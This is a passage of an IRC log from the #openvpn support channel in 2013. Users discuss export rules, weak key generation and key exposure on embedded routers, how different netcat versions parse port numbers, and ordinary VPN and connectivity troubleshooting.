10:47 < axelm7> I just wanted to know if someone could give me some pointers regarding the usual procedure when openvpn export controls are involved
10:48 < pekster> axelm7: To my knowledge no one here is a lawyer. That said, export controls don't apply to open-source software where the code is freely available (again, from my read on US crypto law.)
10:48 < axelm7> this probably happens a lot when openvpn is used commercially
10:48 <@plaisthos> axelm7: not really
10:49 <@plaisthos> axelm7: most either use distribution which already have done this stuff and customers just rely on the distribution to have done the right stuff
10:49 <@plaisthos> or people buy OpenVPN AS in which case you can ask the OpenVPN Corp
10:50 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
10:50 <@plaisthos> I think there are very few people actually doing roll your openvpn *and* do US export stuff
10:51 < EugeneKay> If you have enough money to fill out those forms you'll probably just buy AS
10:53 < axelm7> I have AS and since it is installed in the US I do not need an export license
10:53 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has joined #openvpn
10:53 < axelm7> My issue is with openvpn client on dd-wrt
10:55 <@dazo> axelm7: if you want security review compliance ... you should rather look at openvpn-nl .... which the dutch government uses
10:55 <@dazo> but it uses polarssl instead of openssl ... as openssl is basically impossible to review properly
10:56 <@dazo> axelm7: https://openvpn.fox-it.com/
10:56 <@vpnHelper> Title: OpenVPN-NL (at openvpn.fox-it.com)
10:58 <@dazo> axelm7: and while I'm on a roll .... dd-wrt!?!? seriously!?!? the "littleblackbox" project have basically all ssh and https keys in a database, ready to decrypt the traffic to/from dd-wrt boxes .... and dd-wrt people don't see that as an issue
10:58 <@dazo> dd-wrt is fine inside a locked-down network ... but not when security is needed
11:00 < pekster> One can generate keys off embedded hardware, and in fact that is the recommendation due to the virtually complete lack of entropy on those things
11:00 < pekster> s/off/off of/
11:00 <@dazo> pekster: true ... but having a public private key (see the irony there ;-)) ... that doesn't help either
11:01 <@plaisthos> axelm7: if you use dd-wrt you probably also need US export for all other components like ssh, linux kernel, ....
11:01 <@dazo> and btw ... dd-wrt don't care about mentioning security issues to their users either .... here's a case where an iptables rule was found, opening up the device from specific IP addresses ... http://www.dd-wrt.com/phpBB2/viewtopic.php?t=35783
11:02 < pekster> dazo: cute. OpenWRT has ugly rules (for UCI/LuCI integration, and they look awful) but at least they contain no unpleasant surprises...
11:03 <@dazo> pekster: exactly! I usually remove the UCI firewall crap and install iptables-utils ... then you have some decent tools :)
11:03 < pekster> "it seems that chris implemented this for a customer" <-- huh?!?
11:03 <@dazo> customer == government!?!?
11:04 < pekster> Yea, I have my own custom firmware build. I also hate OpenWRT's UCI-friendly openvpn setup, so I replaced it with a cleaner initscript I wrote from scratch that uses traditional config files like a good implementation
11:04 < axelm7> well, this is for a retail network that does not traffic sensible information
11:04 < pekster> Actually, I need to clean that up and post it online so other people can use my scripts too
11:05 < EugeneKay> I need breakfast.
11:05 <@dazo> pekster: that'd be great :)
11:05 * dazo need to find time to clean-up his own openwrt setup :)
11:05 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:06 < pekster> It also supports an unlimited number of configurations (well, until you OOM the poor router) by way of symlinks. I may choose to clean that up to use a UCI config file for the instance -> config file mappings instead
11:08 < pekster> dazo: FYI, here's my (currently quite limited) GPL OpenWRT offerings: http://pekster.sdf.org/code/projects/openwrt.html . Maybe by the end of this month I can get the openvpn mess cleaned up enough for a public release too
11:08 <@vpnHelper> Title: OpenWRT Misc Code and Scripts (at pekster.sdf.org)
11:08 -!- b1rkh0ff [~b1rkh0ff@178.77.7.9] has quit [Read error: Connection reset by peer]
11:08 * dazo looks
11:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
11:10 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds]
11:12 < axelm7> dazo, regarding the littleblackbox project and ddwrt, the openvpn keys are created on openvpnas, not locally on the router.
11:13 <@dazo> axelm7: openvpn keys, yes .... but not ssh keys, which are used to ssh into the dd-wrt router
11:13 < axelm7> the sshd key might be an issue though if entropy is as bad as you mention
11:13 < pekster> It's hideous
11:13 * pekster digs up the paper on the topic
11:13 <@dazo> axelm7: if you re-create ssh keys on the dd-wrt box, that's also a joke .... you need to create new keys on a proper box with proper entropy ... and those keys needs to be installed
11:14 <@dazo> axelm7: but to make those keys reboot-safe, you basically need to recreate the flash image, iirc
11:14 < axelm7> they can be stored in nvram by command line.
11:14 <@dazo> well, that helps
11:14 < pekster> Here's the paper: http://eprint.iacr.org/2006/086.pdf
11:15 < axelm7> this is from 7 years ago. do you know if this was addressed in newer Linux kernels?
11:16 < pekster> Not on embedded hardware
11:16 < pekster> 29C3 had a talk called "Facthacks" you should watch that brought this up (that was end of 2012)
11:16 <@dazo> pekster: your wrt-iptables stuff looks pretty close to what I have hacked together, but yours is more polished - with the uci integration
11:16 < pekster> It's a limitation on the fact that embedded hardware has no disk, no keyboard/mouse, and no network sources in early-boot
11:16 <@dazo> nice work!
11:17 < pekster> dazo: Yea, I don't like abstracting away everything like the stock LuCI-friendly stuff does, but UCI has a lot of benefits too when used properly
11:17 <@dazo> agreed! ... but writing firewall rules in uci is just .... horrible
11:17 < pekster> My stuff should even run on a stock firmware, although IIRC they still need the iptables-{save,restore} symlinked against iptables (but the support is there)
11:18 * dazo thought you needed the iptables-utils package ... which gives you iptables-multi
11:18 <@dazo> (I might remember wrong, or not having paid attention enough to iptables changes)
11:19 < pekster> Nope, my build does not have CONFIG_PACKAGE_iptables-utils installed
11:20 -!- raidz is now known as raidz_away
11:20 -!- b1rkh0ff [~b1rkh0ff@178.77.7.9] has joined #openvpn
11:20 <@dazo> interesting :)
11:21 <@plaisthos> maybe busybox has now an iptables implementation
11:21 <@dazo> hmm ... plausible, but doubt it
11:22 < pekster> In backfire (10.03.1 that I'm running/building off of) /sbin/iptables is not a symlink; it's an actual executable
11:22 < pekster> I just didn't get the traditional save/restore symlinks and had to add them myself post-boot
11:22 <@dazo> yeah ... and I see this:
11:22 <@dazo> # ll /usr/sbin/iptables*
11:22 <@dazo> -rwxr-xr-x 1 root root 54400 Nov 9 2010 /usr/sbin/iptables
11:22 <@dazo> -rwxr-xr-x 1 root root 54400 Nov 9 2010 /usr/sbin/iptables-restore
11:22 <@dazo> -rwxr-xr-x 1 root root 54400 Nov 9 2010 /usr/sbin/iptables-save
11:22 <@dazo> and the md5sum is identical
11:22 < pekster> Ugh
11:23 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
11:23 < pekster> Maybe iptables-utils "helpfully" did that?
11:23 <@dazo> yeah, probably ... stupid iptables-utils package
11:23 <@dazo> well, it's a rather old and hacky image I'm looking at right now
11:23 < pekster> If it's in jffs2 you might gain the space back by removing and symlinking them (won't help if you build that into your own custom firmware as it'd be squashfs'd)
11:24 -!- AsadH is now known as zz_AsadH
11:24 < |Mike|> n
11:24 <@dazo> pekster: I actually think this is from the image, not post-installed
11:24 <@dazo> (maybe squashfs doesn't support symlinks?)
11:24 < pekster> I put everything in squashfs; learning to use the buildsystem means things like openvpn, tcpdump, and bunches of other goodies are all compressed for space-savings
11:24 <@plaisthos> dazo: 54k is too small for busybox :)
11:25 <@dazo> hahaha
11:26 <@plaisthos> (at least for a big busybox version with all bells and whistles which would include iptables)
11:26 <@dazo> yeah ... busybox is basically an OS without the kernel ;-)
11:27 * dazo waits for the day busybox swallows systemd :-P
11:27 < pekster> a la RMS
11:27 <@dazo> :)
11:27 < axelm7> thanks guys, seems I have some key generation and distribution to do. Thanks for the feedback about the PRNG and the export rules.
11:28 < pekster> axelm7: The tl;dr on that Facthacks talk (they're a funny group to watch if you're into RSA stuff and can spare an hour) is that embedded is bad PRNG, and you should use >=2048 for asymmetric RSA crypto
11:28 <@dazo> axelm7: also, double check your iptables too ;-)
11:29 < pekster> Here's one of their slides: http://pekster.sdf.org/misc/bluffdale_power.png
11:29 < axelm7> and regarding your question about why a big company would use dd-wrt routers? because their procurement department is useless so we have to buy whatever is available off the shelf in the Caribbean.
11:29 <@plaisthos> procurement
11:29 <@plaisthos> argh
11:31 < axelm7> if you want it in ten days, forget about the procurement department.
11:31 -!- Netsplit *.net <-> *.split quits: Sickness\, Jonathan__, Masxmasx, pppingme, mnathani, jtrucks, hive-mind
11:32 -!- Kireji [~nospam@biocontact.org] has left #openvpn []
11:32 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
11:34 <@dazo> pekster: btw ... do you know if there's a new openwrt release in the pipe? last stable release was dec 2011
11:34 <@dazo> that's kinda long ago ....
11:34 < pekster> AA is in _rc now
11:34 < pekster> 12.x
11:34 <@dazo> ohhh ... nice
11:34 <@dazo> probably not updated the web front then
11:35 -!- raidz_away is now known as raidz
11:35 < pekster> http://downloads.openwrt.org/attitude_adjustment/
11:35 <@vpnHelper> Title: Index of /attitude_adjustment/ (at downloads.openwrt.org)
11:35 < pekster> Higher hardware requirements; if you don't have 16M RAM minimum, AA probably won't work
11:35 <@dazo> thx!
11:36 <@dazo> oh, I think wr1043nd got 32
11:36 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
11:36 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
11:36 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn
11:36 -!- Masxmasx [~IetsVulga@unaffiliated/masxmasx] has joined #openvpn
11:36 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn
11:36 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn
11:37 <@plaisthos> are there up to date devices which run openwrt?
11:37 < pekster> Yea, from what I've heard in their channel some of the WDR units are nice with more RAM and wireless N, GigE, etc
11:37 <@plaisthos> Last I checked it was difficult to find a 802.11n/Gigabit device which really ran OpenWrt (without "it runs but ....")
11:38 < pekster> Indeed, you still need to shop carefully to get a unit that works with no open wifi chip, etc
11:38 < pekster> s/no/an/
11:39 < pekster> #openwrt can help better; I've just heard things; I probably won't bother shopping for an AA-supporting unit until I get native IPv6 and need to update. Maybe I'll even run openvpn on it then too (and help them get a build working for 2.3 if they don't have it by then)
11:39 <@plaisthos> I basically just wanted something to bridge from 5ghz to lan and ended up buying a dedicated lan <-> wifi bridge
11:40 < pekster> Yea, you can buy a cheap $20 thing that way, and then put money into a decent *wrt unit that can run your toys and worry less about wifi. eggs and baskets I figure
11:42 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: Connection reset by peer]
11:42 < pekster> My "dev" OpenWRT unit is an Asus WL-500gPv2, an older-model with 8M flash/32M RAM. It runs openvpn nicely, and might possibly run AA. However, wifi is busted unless you run a 2.4 kernel with broadcom's binary kernel blob; I run 2.6 and forgo wifi to get semi-modern support. TBH it's really for openvpn development tasks anyway
11:42 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn
11:42 < pekster> No wifi, and no gigE on that (not that openvpn could handle even 100Mbps with the processor limitations)
11:43 <@dazo> The wr1043nd is 1Gbit bridge with atheros wifi .11/abgn)
11:45 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
11:47 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
11:47 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 260 seconds]
11:48 <@plaisthos> pekster: if you want 802.11a/n nothing is cheap anymore ;)
11:48 < pekster> This is why I like separate functions: a cheap(-ish) wifi AP/bridge, and whatever I need for wired/RAM/flash/proc for the border-CPE
11:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
11:49 < pekster> And I can swap them each out independently as needs change or deals come up
11:49 * pekster misses the days of $20 sales on "good" open-source friendly equipment
11:50 < JackSparrow> hi, i just made netcat work with port 421337. How could that be possible ?
11:51 <@plaisthos> .oO(uint_16 foo = atoi(421337) )
11:52 <@dazo> JackSparrow: integer overflow
11:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
11:57 < pekster> Seems accurate. I get this result with the netcat6 tool (netcat6.sf.net) http://fpaste.org/o1WZ/
11:57 * plaisthos has a different netcat on OS X
11:58 <@plaisthos> nc -4 -l 421337
11:58 <@plaisthos> nc: getaddrinfo: nodename nor servname provided, or not known
11:58 < pekster> One with this bug ;)
11:58 < pekster> without*
11:58 <@plaisthos> yeah
11:58 <@plaisthos> nc -4 -l openvpn also works :)
11:59 < pekster> Yea, I can use service names too
11:59 <@plaisthos> weird implementation
11:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
11:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds]
11:59 -!- Denial- is now known as Denial
11:59 <@plaisthos> you should all pass the port string to getaddrinfo
11:59 <@plaisthos> and don't roll your own does this look like a port or integer value implementation
11:59 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
11:59 < pekster> There's also "gnu-netcat" in my repos - not sure what that is
12:00 <@plaisthos> mine is no gnu netcat
12:00 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
12:00 < pekster> Ironically, here's the repo description for netcat6: "netcat clone with better IPv6 support, improved code, etc..."
12:00 <@plaisthos> it does not like --help or --version
12:00 * pekster chuckles at "improved code"
12:00 < pekster> Ah, then there's a 4th option, "openbsd-netcat"
12:01 <@plaisthos> probably the one I have
12:01 <@plaisthos> OpenBSD => FreeBSD => Mac OS X :)
12:01 < pekster> OpenWRT symlinks that to busybox ;)
12:01 <@plaisthos> or FreeBSD has its own nc
12:02 < pekster> http://fpaste.org/mTTG/
12:02 < pekster> No udp support I guess
12:03 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
12:06 <@plaisthos> no support for almost anything but basic netcat usage :)
12:06 < EugeneKay> But GNU is better!
12:06 < pekster> Well, yea. It accepts 'nc -l -p openvpn' and then chooses some high ephemeral port
12:07 <@plaisthos> EugeneKay: for some people :)
12:07 < EugeneKay> For feeling morally superior
12:07 <@plaisthos> pekster: well drop the -p
12:07 <@plaisthos> -p is source port
12:07 <@plaisthos> on BSD nc using -l with -p is an error
12:07 < pekster> Not according to the output that says "-p PORT Local port"
12:08 <@plaisthos> pekster: :)
12:08 <@ecrist> !inline
12:08 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
12:08 <@plaisthos> pekster: usage could be wrong too
12:08 <@plaisthos> just try it :)
12:08 < pekster> nc: bad address 'openvpn'
12:08 < pekster> ;)
12:09 <@plaisthos> pekster: argh
12:09 < pekster> I think this is the first time I've ever called that command
12:09 <@plaisthos> pekster: I don't think busybox nc has getaddrinfo support :D
12:09 < pekster> (on that host)
12:22 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
12:25 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
12:35 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds]
12:54 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
12:55 -!- discojoe [~wtf@193.28.228.85] has joined #openvpn
12:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
13:00 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds]
13:00 -!- Denial- is now known as Denial
13:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 240 seconds]
13:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 240 seconds]
13:02 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
13:04 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
13:07 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn
13:09 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has joined #openvpn
13:09 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 276 seconds]
13:09 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Read error: Connection reset by peer]
13:10 < plut0> something keeps overwriting the gateway on the client side (windows). if i connect, run a tracert it shows the correct gateway, if i run tracert again, it's using the default gateway which is wrong. why is this happening?
13:10 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn
13:18 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 248 seconds]
13:19 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds]
13:22 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds]
13:25 < JackSparrow> plaisthos: dazo: thanks :)
13:49 < matsh> pekster: Around?
13:50 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 276 seconds]
13:54 -!- dazo is now known as dazo_afk
13:55 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye]
13:56 -!- BtbN [~btbn@btbn.de] has joined #openvpn
13:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
13:57 -!- dekroning [~dekroning@86.86.174.139] has joined #openvpn
13:57 < dekroning> hi
13:57 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn
13:57 < dekroning> i'm using "OpenVPN Connect" on mac osx, and i'm not able to figure out how to add 2 vpn connections, so I started wondering is this even possible?
13:58 < EugeneKay> !osx
13:58 <@vpnHelper> "osx" is (#1) Tunnelblick includes everything you need to run OpenVPN on OS X. https://code.google.com/p/tunnelblick/ or (#2) Viscosity is another OpenVPN client for OS X, but it is commercial. http://www.thesparklabs.com/viscosity/
13:58 < EugeneKay> dekroning - I'm 90% sure that "OpenVPN Connect" is the commercial product
14:00 < EugeneKay> I don't use the two clients listed either (not a Mac user), but I would think that you could launch two instances with them.
14:09 < matsh> !android
14:09 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the
14:09 <@vpnHelper> market
14:13 <@ecrist> ping krzee
15:40 < magic_1> Hi guys, anyone here to help? Having an issue: TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
15:40 < magic_1> Mon Feb 18 23:39:13 2013 TLS Error: TLS handshake failed
15:40 < magic_1> Mon Feb 18 23:39:13 2013 SIGUSR1[soft,tls-error] received, process restarting
15:40 < magic_1> Mon Feb 18 23:39:13 2013 MANAGEMENT: >STATE:1361223553,RECONNECTING,tls-error,
15:40 < magic_1> apologies for the long paste
15:57 < JackSparrow> hi again, the server gives the same IP to my two clients
15:57 < JackSparrow> server config: http://haipeng.xomg.net/server.conf
16:22 < JackSparrow> is it possible to set the server to require a certificate OR username/password?
--- Log closed Mon Feb 18 16:43:51 2013
--- Log opened Mon Feb 18 16:43:59 2013
16:44 < mikie_west> No. Internet?
19:03 < mnice> hello
19:04 < mnice> I'm unable to find any usable openvpn-as for SLES|SUSE .. http://openvpn.net/index.php/download/access-server-downloads.html
19:04 <@vpnHelper> Title: Access Server Downloads (at openvpn.net)
19:05 < mnice> can I get somewhere some generic installer?
19:05 < rob0> !as
19:05 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
19:07 < mnice> fair
20:52 < mikey_w> Hello. Help, my tun device has zero received packets?
20:52 < mikey_w> I can connect to the server but can't see the internet?
20:53 < mikey_w> The server starts without any errors.
20:53 < pekster> What are you trying to do? The end goal?
20:53 < mikey_w> To use my home server as a VPN while at hotspots.
20:54 < mikey_w> Pptpd vpn works.
20:54 < mikey_w> But not all my devices support it.
20:55 < pekster> pptp is an awful protocol that is vastly insecure. It's been known weak for over a decade, and essentially cracked as of last year
20:56 < mikey_w> I know, hence the openvpn attempt.
20:56 < pekster> So, you just want to connect into the VPN? It sounds like you're talking about traffic redirection, but that's not a requirement of a "VPN" per se
20:56 < mikey_w> I am using the sample server conf file.
20:57 < mikey_w> How do I redirect it to the internet?
20:57 < pekster> !redirect
20:57 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
20:57 <@vpnHelper> http://ircpimps.org/redirect.png
20:58 < pekster> Before you deal with redirecting all traffic, you need a functional setup. You must be able to ping your endpoint or your VPN is fundamentally broken and needs to be fixed first
21:00 < mikey_w> I can ping and ssh my home server and my client connects but no internet through it?
21:00 < pekster> The VPN peer, not the external IP
21:01 < mikey_w> Don't understand "VPN peer"?
21:01 < pekster> Pinging the external IP of the server is just as worthless as pinging localhost when your ISP/DSL is disconnected and claiming your internet doesn't work
21:01 < pekster> The tunnel IP, not the external IP. The IP of the peer across the tunnel
21:03 < pekster> ie: the very first block on that flowchart
21:03 < pekster> You'll notice how it says if you can't complete that step you need to "fix your vpn"
21:03 < pekster> Can't route traffic over a link that doesn't work
21:04 < mikey_w> notice that what says that?
21:04 < pekster> The flowchart you were linked
21:05 < pekster> I suggest you read it, and the preceding information since it tells you, step by step, exactly how to do what you want
21:06 < mikey_w> ok, thanks
--- Day changed Tue Feb 19 2013
01:08 <@krzee> I'm getting a weird issue in osx 10.8 where tunnelblick cannot start the vpn, the log says address already in use, but I killed the vpn process manually, and netstat -l|grep 1194 shows nothing
01:09 < pekster> netstat -an is a better bet
01:10 <@krzee> hah it's there
01:10 <@krzee> with no vpn process, what could it be?
01:10 < pekster> Add -p, if Darwin supports it
01:11 <@krzee> never seen 'Add', doesn't seem to be in osx
01:12 < pekster> No, add "-p" to netstat
01:12 <@krzee> oh meh
01:13 <@krzee> no -p and "process" only shows up in the man page under -a
01:14 < pekster> Apple, saving you from useful command switches since 1976
01:15 <@krzee> lsof -i -P doesn't show 1194 anywhere but netstat -an does haha
01:18 < jaws> ps -e | grep openvpn
01:19 < jaws> killall
01:20 <@krzee> no results (except grep)
01:25 <@krzee> lsof doesn't show vpn (except 2 unrelated to openvpn) or 1194 but netstat -an does show 1194
01:28 < jaws> kill 1192 then
01:28 < jaws> I mean kill that process which is using that port
01:29 <@krzee> nothing is using that port
01:31 < jaws> post your lsof -i
01:37 < matsh> I'm getting this on a dd-wrt client:
01:37 < matsh> Mon Feb 18 21:21:13 2013 VERIFY ERROR: depth=1, error=self signed certificate in certificate chain:
01:37 < matsh> Mon Feb 18 21:21:13 2013 TLS_ERROR: BIO read tls_read_plaintext error: error:14090086:lib(20):func(144):reason(134)
01:37 < matsh> Mon Feb 18 21:21:13 2013 TLS Error: TLS object -> incoming plaintext read error
01:38 < matsh> More or less the exact same config as used on a freebsd client.
01:44 < jaws> check your certificate
01:59 * jaws discos with discojoe
03:28 < mnice> hello
03:30 < mnice> I've created a standard vpn using `. ./vars; ./build-ca; build-key-server server; ./build-key clientxx; ..' are these defaults secure and optimized?
03:30 < mnice> vpn works like charm
05:09 <@dazo> mnice: yeah, those defaults (given that you did as the manual says, edit ./vars) are usually quite good
05:12 <@dazo> mnice: you can however increase the key length ... to make it even stronger ... but defaults shouldn't be bad at all
05:27 < discojoe> can I have openvpn run on multiple ports? or do I have to create a new instance for each port?
05:36 < havoc> discojoe: need an instance per port
05:51 < discojoe> ah, thanks havoc
06:47 < mnice> thx
06:47 < mnice> everything runs pretty fine
06:47 < havoc> np
06:48 < mnice> btw, does anybody have some useful set of scripts for generating config files for windows client (openvpn GUI) to help our stupid devels with installation?
06:48 < mnice> **clients ?
09:37 < alaa> hi
09:37 < alaa> I can't access http://openvpn.net from Egypt
09:37 <@vpnHelper> Title: OpenVPN - Open Source VPN (at openvpn.net)
09:37 < alaa> tested multiple ISPs
09:37 < alaa> thought our government might be blocking it, but my ISP claims the block is from the openvpn.net webserver
09:38 < alaa> how do I reach the sysadmins to verify this?
09:38 < kantlivelong> alaa: are you looking for something in particular?
09:38 < kantlivelong> alaa: if they are blocking based on IP then you may not be able to
09:38 < pekster> alaa: You can traceroute to see if you get closer to the server; if you can't make it past your ISP or into US core routing, it's not a webserver problem
09:38 < alaa> kantlivelong: just want to make sure there is no illegal censorship going on in my country
09:39 < kantlivelong> alaa: ah.
09:39 <@ecrist> alaa: we're not blocking Egypt
09:39 < kantlivelong> alaa: does it resolve to an IP?
09:39 < pekster> You'll also find people here happy to mirror installer files (I'm happy to help with installers and the GPG signatures on my personal domain if you'd like)
09:39 < alaa> pekster: thx, many workarounds, but I'm more interested in fighting this
09:40 <@ecrist> alaa: we're not blocking Egypt
09:40 < alaa> kantlivelong: yes 67.228.116.150
09:40 < kantlivelong> alaa: what does a traceroute provide?
09:40 < alaa> kantlivelong: do I paste here?
09:40 < alaa> kantlivelong: it stops at a local hop
09:40 < kantlivelong> alaa: pastebin.ca
09:40 < pekster> A pastebin please. dpaste.org or such
09:40 < rob0> use a pastebin, obviously
09:41 < rob0> If it stops at a local hop, there's your problem.
09:41 < alaa> rob0: sorry, been some time since I used IRC
09:41 <@ecrist> if the traceroute stops locally, you've got something messed up
09:42 < alaa> http://dpaste.org/WiZSK/
09:42 < alaa> traceroute
09:42 < pekster> And it continues timing out after that? Some hosts don't respond to traceroute, so you might get a few "***" lines in a row before it picks up again
09:42 < alaa> could it be some automatically triggered anti-DDoS measure?
09:43 < alaa> pekster: yeah it continues to time out
09:43 < pekster> No, traceroute should work, and even if it doesn't, you should be able to hit the openvpn.net webserver without issue. Looks like an ISP-level block
09:43 < kantlivelong> alaa: is calling the ISP an option?
09:43 < alaa> kantlivelong: I did, they claimed blocking is from openvpn.net side
09:43 < pekster> If you'd like a mirror of some files to get a VPN client working so you can bypass the ISP issue, let me know what you need and I'll mirror files for you
09:43 <@ecrist> alaa: I have someone looking into it
09:44 < alaa> kantlivelong: asked on twitter and got confirmation that the site is inaccessible from all local ISPs
09:44 <@ecrist> sounds like you might be triggering a DDoS filter
09:44 < alaa> ecrist: ahah that fits with the ISP's claim
09:45 < kantlivelong> DoS filter sounds logical
09:45 < alaa> sorry, political situation here is vague and I fear the state will start blocking illegally
09:45 < kantlivelong> alaa: I'm sure there are mirrors :) and Tor can always help
09:45 < kantlivelong> Tor/OpenVPN
09:45 < rob0> Sounds like the ISP is either clueless or lying.
09:46 < pekster> ^^ that
09:46 < alaa> kantlivelong: yeah I'm not worried about actual access as much as about the political fight for the right of it :-)
09:46 < kantlivelong> alaa: yeh.. stupid govts..
09:46 < rob0> OpenVPN.net has no desire to block Egypt, I am sure.
09:47 < pekster> Quite the reverse, no doubt
09:47 < alaa> ecrist: can you confirm somehow if it's a DoS filter? Is there a log or something?
09:47 < alaa> rob0: of course
09:47 <@ecrist> alaa: I don't have access to those filtering boxes directly, but the guy who has access will look into it shortly
09:47 < rob0> alaa, the filter is probably being hit in your ISP.
09:48 <@ecrist> alaa: we'd still like to see a traceroute from you
09:48 < pekster> Not to say looking at the US-side isn't a good thing to rule it out, but why would that be an issue with a traceroute dropping before it hits core US routing?
09:48 < pekster> ecrist: Already have it: http://dpaste.org/WiZSK/
09:48 < rob0> anyway, my traceroute/tracepaths also time out after 14 hops.
09:49 < rob0> (8 of those hops are outside my ISP.)
09:49 < pekster> tedata.net is out of Giza, Egypt
09:49 < alaa> ecrist: actually scrap that traceroute, I'm getting the same result no matter what I'm testing; I'll ask a friend using a different ISP to send his
09:49 < pekster> heh, they block all traceroute. Cute.
09:49 <@ecrist> or he's quitting it too early
09:49 < pekster> True
09:50 < rob0> usually 30 hops should be enough
09:50 < alaa> I'm using the default 30 hops
09:51 < pekster> Right, but sometimes you'll get 4-8 routers in a row that drop it (now if it runs until 30+ TTL without change, then that's not the issue)
09:52 < alaa> runs until 30
09:52 < alaa> same result pointing at google.com
09:52 <@ecrist> can you ping the IP?
09:52 < rob0> po2.fcr01.sr01.sea01.networklayer.com (67.228.118.138) is the last visible hop for me, tested from two sites with both traceroute & tracepath 09:53 < pekster> Yea, here's the trailing tracepath for me (the comcast.net stuff is my ISP's infra) http://dpaste.org/42OZJ/ 09:53 <@ecrist> nm, I can't ping, either 09:53 < alaa> ecrist: nope 09:53 <@ecrist> rob0: I make it one hop further it seems, than you do, before my trace dies 09:53 < pekster> You could try a ping-based traceroute though (maybe it'll get further than the ISP, possibly.) 09:53 < rob0> 3 packets transmitted, 0 received, 100% packet loss, time 2000ms 09:53 < alaa> ecrist: I can ping it from an east coast US server 09:54 < rob0> My ping was from a colo site in Birmingham, Alabama 09:55 < rob0> Perhaps OpenVPN should consider allowing ping and traceroute, limited if desired. 09:55 < alaa> that's traceroute from friend who is on another isp http://pastebin.com/Aex0P83d 09:55 <@ecrist> rob0: it's bad practice imho, to limit such 09:56 <@ecrist> I'll talk to the guys and make sure we start allowing it 09:57 < rob0> heh. I can't reach http://openvpn.net/ either. 09:57 <@vpnHelper> Title: OpenVPN - Open Source VPN (at openvpn.net) 09:58 < rob0> but vpnHelper can! 09:58 <@ecrist> vpnHelper is on the same box I IRC from 09:58 <@ecrist> and that I 